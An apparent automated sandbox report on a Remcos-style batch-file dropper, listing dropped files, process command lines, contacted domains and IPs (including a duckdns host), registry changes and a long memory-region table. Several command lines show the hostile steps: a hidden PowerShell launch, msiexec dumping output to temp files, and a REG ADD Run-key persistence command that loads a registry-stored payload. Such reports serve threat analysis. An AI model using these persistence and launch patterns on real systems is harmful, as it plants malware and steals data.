Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| `ZW_PCCE-010023024001.bat` | ASCII text, with very long lines (5980), with no line terminators | initial sample | |
| `C:\ProgramData\remcos\logs.dat` | data | dropped | |
| `C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs` | data | dropped | |
| `C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\json[1].json` | JSON data | dropped | |
| `C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache` | data | modified | |
| `C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive` | data | dropped | |
| `C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kl32ek5g.jjk.ps1` | ASCII text, with no line terminators | dropped | |
| `C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mje33vhh.a24.psm1` | ASCII text, with no line terminators | dropped | |
| `C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vaucwujz.b0r.psm1` | ASCII text, with no line terminators | dropped | |
| `C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x45nip12.f4u.ps1` | ASCII text, with no line terminators | dropped | |
| `C:\Users\user\AppData\Local\Temp\bhv6BC6.tmp` | Extensible storage engine DataBase, version 0x620, checksum 0x5c23815b, page size 32768, DirtyShutdown, Windows version 10.0 | dropped | |
| `C:\Users\user\AppData\Local\Temp\kywjvrv` | Unicode text, UTF-16, little-endian text, with no line terminators | dropped | |
| `C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\2BWCY09RDCGF38WA994P.temp` | data | dropped | |
| `C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\590aee7bdd69b59b.customDesusertions-ms (copy)` | data | dropped | |
| `C:\Users\user\AppData\Roaming\Trykimprgneredes.Ene` | ASCII text, with very long lines (65536), with no line terminators | dropped | |

Processes

| Path | Cmdline | Malicious |
|---|---|---|
| `C:\Windows\System32\cmd.exe` | `C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ZW_PCCE-010023024001.bat" "` | |
| `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -windowstyle hidden "…"` | |
| `C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` | `"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "…"` | |
| `C:\Windows\SysWOW64\msiexec.exe` | `"C:\Windows\SysWOW64\msiexec.exe"` | |
| `C:\Windows\SysWOW64\msiexec.exe` | `C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kywjvrv"` | |
| `C:\Windows\SysWOW64\msiexec.exe` | `C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uabbwbgmjcn"` | |
| `C:\Windows\SysWOW64\msiexec.exe` | `C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fuomwurowkfkpf"` | |
| `C:\Windows\SysWOW64\wscript.exe` | `"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs"` | |
| `C:\Windows\System32\conhost.exe` | `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` | |
| `C:\Windows\System32\conhost.exe` | `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` | |
| `C:\Windows\System32\conhost.exe` | `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` | |
| `C:\Windows\SysWOW64\cmd.exe` | `"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"` | |
| `C:\Windows\System32\conhost.exe` | `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` | |
| `C:\Windows\SysWOW64\reg.exe` | `REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"` | |

URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
Domains

| Name | IP | Malicious |
|---|---|---|
| rj0987654321.duckdns.org | 193.187.91.212 | |
| ethys.ro | 81.180.144.124 | |
| geoplugin.net | 178.237.33.50 | |
| s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | |

IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 193.187.91.212 | rj0987654321.duckdns.org | Sweden | |
| 81.180.144.124 | ethys.ro | Romania | |
| 178.237.33.50 | geoplugin.net | Netherlands | |

Registry

| Path | Value | Malicious |
|---|---|---|
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | EnableFileTracing | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | EnableAutoFileTracing | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | EnableConsoleTracing | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | FileTracingMask | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | ConsoleTracingMask | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | MaxFileSize | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | FileDirectory | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | EnableFileTracing | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | EnableAutoFileTracing | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | EnableConsoleTracing | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | FileTracingMask | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | ConsoleTracingMask | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | MaxFileSize | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | FileDirectory | |
| `HKEY_CURRENT_USER\SOFTWARE\Millihenries` | Scuttock | |
| `HKEY_CURRENT_USER\Environment` | Mirko | |
| `HKEY_CURRENT_USER\SOFTWARE\Rmc-I42HQ2` | exepath | |
| `HKEY_CURRENT_USER\SOFTWARE\Rmc-I42HQ2` | licence | |
| `HKEY_CURRENT_USER\SOFTWARE\Rmc-I42HQ2` | time | |
| `HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache` | LangID | |
| `HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache` | `C:\Windows\System32\WScript.exe.FriendlyAppName` | |
| `HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache` | `C:\Windows\System32\WScript.exe.ApplicationCompany` | |
| `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` | Startup key | |

Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
|
heap
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
7FF887CE0000
|
trusted library allocation
|
page read and write
|
||
B438B7000
|
stack
|
page read and write
|
||
7FF887D50000
|
trusted library allocation
|
page read and write
|
||
7602000
|
heap
|
page read and write
|
||
9D9000
|
heap
|
page read and write
|
||
8440000
|
trusted library allocation
|
page read and write
|
||
13FEA1B3000
|
heap
|
page read and write
|
||
B4468E000
|
stack
|
page read and write
|
||
13F90021000
|
trusted library allocation
|
page read and write
|
||
755000
|
stack
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
25C0000
|
heap
|
page read and write
|
||
13FE9720000
|
trusted library allocation
|
page read and write
|
||
2671000
|
heap
|
page read and write
|
||
13FE9EC0000
|
heap
|
page read and write
|
||
43AD000
|
heap
|
page read and write
|
||
7FF887CD0000
|
trusted library allocation
|
page read and write
|
||
3025000
|
trusted library allocation
|
page execute and read and write
|
||
267B000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
7FF887C20000
|
trusted library allocation
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
4A9B000
|
heap
|
page read and write
|
||
13F81A39000
|
trusted library allocation
|
page read and write
|
||
6EDF000
|
stack
|
page read and write
|
||
2699000
|
heap
|
page read and write
|
||
13F80703000
|
trusted library allocation
|
page read and write
|
||
253D000
|
stack
|
page read and write
|
||
13F8049F000
|
trusted library allocation
|
page read and write
|
||
268D000
|
heap
|
page read and write
|
||
77BE000
|
stack
|
page read and write
|
||
13FE7EF0000
|
heap
|
page read and write
|
||
8420000
|
heap
|
page read and write
|
||
8A01000
|
heap
|
page read and write
|
||
43AE000
|
heap
|
page read and write
|
||
8A9B000
|
heap
|
page read and write
|
||
83A000
|
heap
|
page read and write
|
||
4A9B000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
31D1000
|
heap
|
page read and write
|
||
6A9E000
|
stack
|
page read and write
|
||
4C90000
|
trusted library allocation
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
7FF887BD0000
|
trusted library allocation
|
page read and write
|
||
7800000
|
trusted library allocation
|
page read and write
|
||
13FEA1E7000
|
heap
|
page read and write
|
||
13F902EB000
|
trusted library allocation
|
page read and write
|
||
269A000
|
heap
|
page read and write
|
||
86D0000
|
heap
|
page read and write
|
||
2B40000
|
heap
|
page read and write
|
||
13FE9B20000
|
trusted library allocation
|
page read and write
|
||
9DB000
|
heap
|
page read and write
|
||
268E000
|
heap
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
8A01000
|
heap
|
page read and write
|
||
13F806BD000
|
trusted library allocation
|
page read and write
|
||
4ABF000
|
heap
|
page read and write
|
||
2696000
|
heap
|
page read and write
|
||
2559D000
|
heap
|
page read and write
|
||
13F804F9000
|
trusted library allocation
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
4AC9000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
2674000
|
heap
|
page read and write
|
||
554000
|
stack
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
4ABA000
|
heap
|
page read and write
|
||
8AA4000
|
heap
|
page read and write
|
||
7544000
|
heap
|
page read and write
|
||
13FE7E80000
|
heap
|
page read and write
|
||
43AF000
|
heap
|
page read and write
|
||
7535000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
715A000
|
stack
|
page read and write
|
||
2B46000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
2661000
|
heap
|
page read and write
|
||
BCD000
|
stack
|
page read and write
|
||
7FF887A90000
|
trusted library allocation
|
page execute and read and write
|
||
7830000
|
trusted library allocation
|
page execute and read and write
|
||
8A37000
|
heap
|
page read and write
|
||
13FE9F15000
|
heap
|
page read and write
|
||
4DC2000
|
heap
|
page read and write
|
||
4A97000
|
heap
|
page read and write
|
||
499E000
|
heap
|
page read and write
|
||
2AA0000
|
heap
|
page read and write
|
||
2696000
|
heap
|
page read and write
|
||
13FE7E6C000
|
heap
|
page read and write
|
||
43A5000
|
heap
|
page read and write
|
||
B006000
|
direct allocation
|
page execute and read and write
|
||
13FEA11D000
|
heap
|
page read and write
|
||
5BB1000
|
trusted library allocation
|
page read and write
|
||
4A21000
|
trusted library allocation
|
page read and write
|
||
B439B9000
|
stack
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
2694000
|
heap
|
page read and write
|
||
4A9B000
|
heap
|
page read and write
|
||
13FEA11F000
|
heap
|
page read and write
|
||
26A6000
|
heap
|
page read and write
|
||
BA06000
|
direct allocation
|
page execute and read and write
|
||
7DF4FD240000
|
trusted library allocation
|
page execute and read and write
|
||
7070000
|
direct allocation
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
43B1000
|
heap
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
B43ABE000
|
stack
|
page read and write
|
||
13FEA0F7000
|
heap
|
page execute and read and write
|
||
43A0000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
302A000
|
heap
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
89C0000
|
direct allocation
|
page read and write
|
||
8AA4000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
4DCC000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
43A5000
|
heap
|
page read and write
|
||
7FF887B81000
|
trusted library allocation
|
page read and write
|
||
7900000
|
trusted library allocation
|
page read and write
|
||
3040000
|
trusted library allocation
|
page read and write
|
||
3380000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
49FF000
|
stack
|
page read and write
|
||
5040000
|
trusted library allocation
|
page read and write
|
||
2686000
|
heap
|
page read and write
|
||
4A98000
|
heap
|
page read and write
|
||
70C0000
|
direct allocation
|
page read and write
|
||
4AA9000
|
heap
|
page read and write
|
||
7880000
|
trusted library allocation
|
page read and write
|
||
8A99000
|
heap
|
page read and write
|
||
B431EE000
|
stack
|
page read and write
|
||
83B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887AB6000
|
trusted library allocation
|
page execute and read and write
|
||
43A9000
|
heap
|
page read and write
|
||
25FB1000
|
heap
|
page read and write
|
||
73DE000
|
stack
|
page read and write
|
||
2DA000
|
stack
|
page read and write
|
||
705B000
|
stack
|
page read and write
|
||
8940000
|
trusted library allocation
|
page read and write
|
||
EBE000
|
stack
|
page read and write
|
||
269B000
|
heap
|
page read and write
|
||
2657000
|
heap
|
page read and write
|
||
7860000
|
trusted library allocation
|
page read and write
|
||
13FE9D80000
|
heap
|
page execute and read and write
|
||
725B000
|
stack
|
page read and write
|
||
4A9E000
|
heap
|
page read and write
|
||
13FE7E73000
|
heap
|
page read and write
|
||
4C90000
|
trusted library allocation
|
page read and write
|
||
7FF887BB2000
|
trusted library allocation
|
page read and write
|
||
84C5000
|
trusted library allocation
|
page read and write
|
||
43C1000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
4A97000
|
heap
|
page read and write
|
||
89E0000
|
direct allocation
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
3384000
|
heap
|
page read and write
|
||
31C0000
|
heap
|
page read and write
|
||
89B0000
|
direct allocation
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
8AA4000
|
heap
|
page read and write
|
||
95E000
|
unkown
|
page read and write
|
||
8A9A000
|
heap
|
page read and write
|
||
4ABE000
|
heap
|
page read and write
|
||
43B1000
|
heap
|
page read and write
|
||
24605000
|
heap
|
page read and write
|
||
2675000
|
heap
|
page read and write
|
||
7FF887D40000
|
trusted library allocation
|
page read and write
|
||
7FF887CC0000
|
trusted library allocation
|
page read and write
|
||
13F815B8000
|
trusted library allocation
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
25596000
|
heap
|
page read and write
|
||
13FE9E20000
|
heap
|
page execute and read and write
|
||
503E000
|
trusted library allocation
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
B436FE000
|
stack
|
page read and write
|
||
5A21000
|
trusted library allocation
|
page read and write
|
||
24820000
|
heap
|
page read and write
|
||
4A7A000
|
trusted library allocation
|
page read and write
|
||
26A6000
|
heap
|
page read and write
|
||
3070000
|
heap
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
30C8000
|
trusted library allocation
|
page read and write
|
||
5031000
|
heap
|
page read and write
|
||
13FE97D0000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
43BA000
|
heap
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
86F8000
|
heap
|
page read and write
|
||
2661000
|
heap
|
page read and write
|
||
8AAB000
|
heap
|
page read and write
|
||
13FE7E2D000
|
heap
|
page read and write
|
||
7FF887BA0000
|
trusted library allocation
|
page execute and read and write
|
||
43B8000
|
heap
|
page read and write
|
||
5026000
|
trusted library allocation
|
page read and write
|
||
8610000
|
heap
|
page read and write
|
||
7FF887C40000
|
trusted library allocation
|
page read and write
|
||
7FF8879D2000
|
trusted library allocation
|
page read and write
|
||
293E000
|
stack
|
page read and write
|
||
85CC000
|
stack
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
26A6000
|
heap
|
page read and write
|
||
2674000
|
heap
|
page read and write
|
||
30F0000
|
heap
|
page execute and read and write
|
||
43B8000
|
heap
|
page read and write
|
||
473000
|
system
|
page execute and read and write
|
||
43B8000
|
heap
|
page read and write
|
||
24020000
|
remote allocation
|
page read and write
|
||
2FED000
|
trusted library allocation
|
page execute and read and write
|
||
267B000
|
heap
|
page read and write
|
||
2DFE000
|
stack
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
B43937000
|
stack
|
page read and write
|
||
4AB6000
|
heap
|
page read and write
|
||
13FE9EC2000
|
heap
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
2645000
|
heap
|
page read and write
|
||
266D000
|
heap
|
page read and write
|
||
89A0000
|
direct allocation
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
3383000
|
heap
|
page read and write
|
||
78D0000
|
trusted library allocation
|
page read and write
|
||
2689000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
43B6000
|
heap
|
page read and write
|
||
4991000
|
heap
|
page read and write
|
||
2694000
|
heap
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
4DCD000
|
heap
|
page read and write
|
||
13F80001000
|
trusted library allocation
|
page read and write
|
||
7FF887C30000
|
trusted library allocation
|
page read and write
|
||
268E000
|
heap
|
page read and write
|
||
43AF000
|
heap
|
page read and write
|
||
8A44000
|
heap
|
page read and write
|
||
8A96000
|
heap
|
page read and write
|
||
777F000
|
stack
|
page read and write
|
||
2AA8000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
2D70000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
25592000
|
heap
|
page read and write
|
||
83AE000
|
stack
|
page read and write
|
||
43B0000
|
heap
|
page read and write
|
||
24681000
|
heap
|
page read and write
|
||
13F9000F000
|
trusted library allocation
|
page read and write
|
||
8A37000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
2697000
|
heap
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
4C92000
|
heap
|
page read and write
|
||
78B0000
|
trusted library allocation
|
page read and write
|
||
245F8000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
98C000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
5A49000
|
trusted library allocation
|
page read and write
|
||
D00000
|
heap
|
page read and write
|
||
4991000
|
heap
|
page read and write
|
||
8AA4000
|
heap
|
page read and write
|
||
4380000
|
heap
|
page read and write
|
||
257D000
|
stack
|
page read and write
|
||
7FF887BB7000
|
trusted library allocation
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
2FF8000
|
heap
|
page read and write
|
||
2F5A000
|
heap
|
page read and write
|
||
2660000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
4A90000
|
trusted library allocation
|
page read and write
|
||
8430000
|
trusted library allocation
|
page read and write
|
||
4A98000
|
heap
|
page read and write
|
||
74F0000
|
heap
|
page read and write
|
||
3020000
|
heap
|
page read and write
|
||
25591000
|
heap
|
page read and write
|
||
48C6000
|
heap
|
page read and write
|
||
13F8048D000
|
trusted library allocation
|
page read and write
|
||
D60000
|
heap
|
page read and write
|
||
8A9B000
|
heap
|
page read and write
|
||
8A50000
|
heap
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
4A9E000
|
heap
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
25FBB000
|
heap
|
page read and write
|
||
7FF887B70000
|
trusted library allocation
|
page read and write
|
||
7840000
|
trusted library allocation
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
30FF000
|
unkown
|
page read and write
|
||
4A98000
|
heap
|
page read and write
|
||
773E000
|
stack
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
70A0000
|
direct allocation
|
page read and write
|
||
13FE7C80000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
13F80B81000
|
trusted library allocation
|
page read and write
|
||
6E9E000
|
stack
|
page read and write
|
||
4AD3000
|
heap
|
page read and write
|
||
2657000
|
heap
|
page read and write
|
||
8A99000
|
heap
|
page read and write
|
||
31BF000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
24614000
|
heap
|
page read and write
|
||
8A9B000
|
heap
|
page read and write
|
||
2680000
|
heap
|
page read and write
|
||
13FE7D80000
|
heap
|
page read and write
|
||
8A99000
|
heap
|
page read and write
|
||
25FB5000
|
heap
|
page read and write
|
||
2DBE000
|
unkown
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
C406000
|
direct allocation
|
page execute and read and write
|
||
350000
|
heap
|
page read and write
|
||
B4367E000
|
stack
|
page read and write
|
||
13FE9760000
|
heap
|
page readonly
|
||
6F4E000
|
stack
|
page read and write
|
||
267D000
|
heap
|
page read and write
|
||
13F81D81000
|
trusted library allocation
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
B43166000
|
stack
|
page read and write
|
||
810000
|
heap
|
page read and write
|
||
2651000
|
heap
|
page read and write
|
||
7FF887BC0000
|
trusted library allocation
|
page execute and read and write
|
||
2CAC000
|
stack
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
4AA1000
|
heap
|
page read and write
|
||
78A0000
|
trusted library allocation
|
page read and write
|
||
43CE000
|
heap
|
page read and write
|
||
24581000
|
heap
|
page read and write
|
||
13FEA1F6000
|
heap
|
page read and write
|
||
82F0000
|
trusted library allocation
|
page read and write
|
||
5407000
|
trusted library allocation
|
page read and write
|
||
13FE7EF5000
|
heap
|
page read and write
|
||
8707000
|
heap
|
page read and write
|
||
4ABA000
|
heap
|
page read and write
|
||
4A9B000
|
heap
|
page read and write
|
||
13F80483000
|
trusted library allocation
|
page read and write
|
||
7FF887D00000
|
trusted library allocation
|
page read and write
|
||
8AAB000
|
heap
|
page read and write
|
||
5A86000
|
trusted library allocation
|
page read and write
|
||
8AAB000
|
heap
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
340000
|
heap
|
page read and write
|
||
7FF887AF0000
|
trusted library allocation
|
page execute and read and write
|
||
D68000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
C5C000
|
stack
|
page read and write
|
||
4A99000
|
heap
|
page read and write
|
||
4AA9000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
31FD000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
24581000
|
heap
|
page read and write
|
||
4A95000
|
heap
|
page read and write
|
||
267E000
|
heap
|
page read and write
|
||
43AD000
|
heap
|
page read and write
|
||
B43C3B000
|
stack
|
page read and write
|
||
13FEA1D4000
|
heap
|
page read and write
|
||
C40000
|
heap
|
page read and write
|
||
B43B3E000
|
stack
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
13FEA100000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
97E000
|
unkown
|
page read and write
|
||
4A97000
|
heap
|
page read and write
|
||
2D50000
|
heap
|
page read and write
|
||
265A000
|
heap
|
page read and write
|
||
268A000
|
heap
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
13FEA182000
|
heap
|
page read and write
|
||
13F81E9B000
|
trusted library allocation
|
page read and write
|
||
4A9B000
|
heap
|
page read and write
|
||
719E000
|
stack
|
page read and write
|
||
4A99000
|
heap
|
page read and write
|
||
13FE7F60000
|
heap
|
page read and write
|
||
8A9A000
|
heap
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
8A43000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
4ABA000
|
heap
|
page read and write
|
||
4A91000
|
heap
|
page read and write
|
||
751E000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
25FBD000
|
heap
|
page read and write
|
||
2650000
|
heap
|
page read and write
|
||
26A6000
|
heap
|
page read and write
|
||
86BA000
|
heap
|
page read and write
|
||
30E0000
|
trusted library allocation
|
page read and write
|
||
13F81D86000
|
trusted library allocation
|
page read and write
|
||
266C000
|
heap
|
page read and write
|
||
71C000
|
stack
|
page read and write
|
||
4A99000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
D50000
|
heap
|
page read and write
|
||
3180000
|
heap
|
page read and write
|
||
32CF000
|
stack
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
7FF8879EB000
|
trusted library allocation
|
page read and write
|
||
13FE7E43000
|
heap
|
page read and write
|
||
8A01000
|
heap
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
8A37000
|
heap
|
page read and write
|
||
4AB6000
|
heap
|
page read and write
|
||
83F0000
|
trusted library allocation
|
page read and write
|
||
9206000
|
direct allocation
|
page execute and read and write
|
||
13FE7E2B000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
267E000
|
heap
|
page read and write
|
||
8A50000
|
heap
|
page read and write
|
||
82D7000
|
stack
|
page read and write
|
||
13FE9E74000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
711E000
|
stack
|
page read and write
|
||
8A9B000
|
heap
|
page read and write
|
||
2FA0000
|
heap
|
page read and write
|
||
4A98000
|
heap
|
page read and write
|
||
305E000
|
heap
|
page read and write
|
||
1DB000
|
stack
|
page read and write
|
||
43A1000
|
heap
|
page read and write
|
||
2671000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page readonly
|
||
6F00000
|
heap
|
page execute and read and write
|
||
545A000
|
trusted library allocation
|
page read and write
|
||
4A98000
|
heap
|
page read and write
|
||
B4383E000
|
stack
|
page read and write
|
||
13FE9750000
|
trusted library allocation
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
2661000
|
heap
|
page read and write
|
||
2686000
|
heap
|
page read and write
|
||
6A5C000
|
stack
|
page read and write
|
||
3383000
|
heap
|
page read and write
|
||
2FE3000
|
trusted library allocation
|
page execute and read and write
|
||
8A8C000
|
heap
|
page read and write
|
||
3022000
|
trusted library allocation
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
2FE4000
|
trusted library allocation
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
2686000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
2694000
|
heap
|
page read and write
|
||
7FF887C80000
|
trusted library allocation
|
page read and write
|
||
25590000
|
heap
|
page read and write
|
||
2681000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
4C90000
|
trusted library allocation
|
page read and write
|
||
13FE7E23000
|
heap
|
page read and write
|
||
25591000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
24614000
|
heap
|
page read and write
|
||
24950000
|
heap
|
page read and write
|
||
B4357E000
|
stack
|
page read and write
|
||
13FE9E7B000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
43AE000
|
heap
|
page read and write
|
||
13F80B9D000
|
trusted library allocation
|
page read and write
|
||
7F200000
|
trusted library allocation
|
page execute and read and write
|
||
43B5000
|
heap
|
page read and write
|
||
43AD000
|
heap
|
page read and write
|
||
75AF000
|
heap
|
page read and write
|
||
E7E000
|
stack
|
page read and write
|
||
43B6000
|
heap
|
page read and write
|
||
43E3000
|
heap
|
page read and write
|
||
7FF8879E0000
|
trusted library allocation
|
page read and write
|
||
13FE9EAA000
|
heap
|
page read and write
|
||
6E5F000
|
stack
|
page read and write
|
||
2694000
|
heap
|
page read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
930000
|
heap
|
page read and write
|
||
13F805CE000
|
trusted library allocation
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
4990000
|
heap
|
page read and write
|
||
2F77000
|
heap
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
866D000
|
stack
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
2675000
|
heap
|
page read and write
|
||
4AD4000
|
heap
|
page read and write
|
||
43D8000
|
heap
|
page read and write
|
||
2671000
|
heap
|
page read and write
|
||
304B000
|
heap
|
page read and write
|
||
48CE000
|
heap
|
page read and write
|
||
2672000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
B437F9000
|
stack
|
page read and write
|
||
980000
|
heap
|
page read and write
|
||
2671000
|
heap
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
4C90000
|
trusted library allocation
|
